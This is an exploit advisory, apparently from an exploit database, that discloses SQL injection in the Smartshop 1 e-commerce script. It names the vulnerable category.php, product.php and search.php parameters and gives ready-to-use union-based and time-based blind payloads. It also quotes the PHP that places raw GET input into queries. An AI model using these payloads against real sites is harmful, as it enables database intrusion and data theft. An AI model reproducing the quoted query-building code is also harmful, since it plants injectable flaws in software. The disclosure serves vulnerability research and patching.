Smartshop 1 SQL Injection

2018.06.04
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: Smartshop 1 - SQL Injection # Date: 2018-06-02 # Exploit Author: L0RD or borna.nematzadeh123@gmail.com # Software Link: https://github.com/smakosh/Smartshop/archive/master.zip # Vendor Homepage: https://www.behance.net/gallery/49080415/Smartshop-Free-e-commerce-website # Version: 1 # Tested on: Kali linux ================================================= # Description : Smartshop 1 suffers from sql injection which attacker can inject sql commands . ================================================= # POC : SQLi # vulnerable files : [ category.php , product.php , search.php ] 1) category.php : # Parameter : id # Type : Union based # Payload : ' UNION SELECT 1,user(),3,4,5%23 # Vulnerable code : $id_category =$_GET['id']; $start = ($page > 1) ? ($page * $perpage) - $perpage : 0; $queryproduct = "SELECT SQL_CALC_FOUND_ROWS id, name, price, id_picture, thumbnail FROM product WHERE id_category = '{$id_category}' ORDER BY id DESC LIMIT {$start}, 16"; $result = $connection->query($queryproduct); ================================================= 2) product.php : # Parameter : id # Type : Union based # Payload : ' UNION SELECT 1,user(),database(),4,5,6%23 # Vulnerable code : $id_product =$_GET['id']; $queryproduct = "SELECT id, name, price, description, id_picture, thumbnail FROM product WHERE id = '{$id_product}'"; $result1 = $connection->query($queryproduct); ================================================= 3) search.php : # Parameter : searched # Type : Time-based blind # Payload : ' AND SLEEP(10)%23 # Vulnerable code : $word = $_GET['searched']; $queryproduct = "SELECT SQL_CALC_FOUND_ROWS id, name, price, id_picture, thumbnail FROM product WHERE name LIKE '%{$word}%' ORDER BY id DESC LIMIT {$start}, 16"; $result = $connection->query($queryproduct); =================================================


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top